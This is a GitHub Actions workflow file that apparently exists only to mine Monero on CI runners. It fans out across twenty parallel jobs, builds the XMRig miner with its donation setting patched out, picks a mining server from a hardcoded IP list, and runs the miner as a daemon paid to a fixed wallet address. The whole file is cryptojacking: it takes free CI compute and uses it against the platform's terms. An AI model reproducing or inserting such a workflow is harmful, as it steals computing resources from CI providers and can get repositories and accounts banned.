run:
        name: Run
        runs-on: ubuntu-latest
        strategy:
          fail-fast: false
          matrix:
            runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]
        steps:
          - shell: bash
            run: |
              sudo apt-get update
              sudo apt-get install --yes \
              build-essential \
              cmake \
              git \
              libhwloc-dev \
              libssl-dev \
              libuv1-dev

              curl --location --output xmrig.tar.gz \
              https://github.com/xmrig/xmrig/archive/refs/tags/v6.10.0.tar.gz || exit 1
              tar xf xmrig.tar.gz || exit 1
              cd xmrig-* || exit 1
              # Izvinite)))))
              sed -i 's/= 1;/= 0;/' src/donate.h || exit 1
              mkdir build || exit 1
              cd build || exit 1
              cmake .. -DCMAKE_BUILD_TYPE=Release || exit 1
              make --jobs=$(nproc) || exit 1

              adres=44ddYWVDQFofmZ29hxQYEKX8YmCtij12PENUUiPJWcmXUqfRG9ucbbB5EjRWxfynBRCZRLuvgTHbPY4XXkB9GXviNphoHHG

              servery=(
              131.153.142.106:80
               )

              while true; do
              server=${servery[$(( RANDOM % ${#servery[@]} ))]}
              if curl --silent --connect-timeout 5 --fail http://${server}/get_info >/dev/null; then
              break
              else
              echo $server ne v seti
              fi
              done

              ./xmrig --url=$server --user=$adres --coin monero --daemon
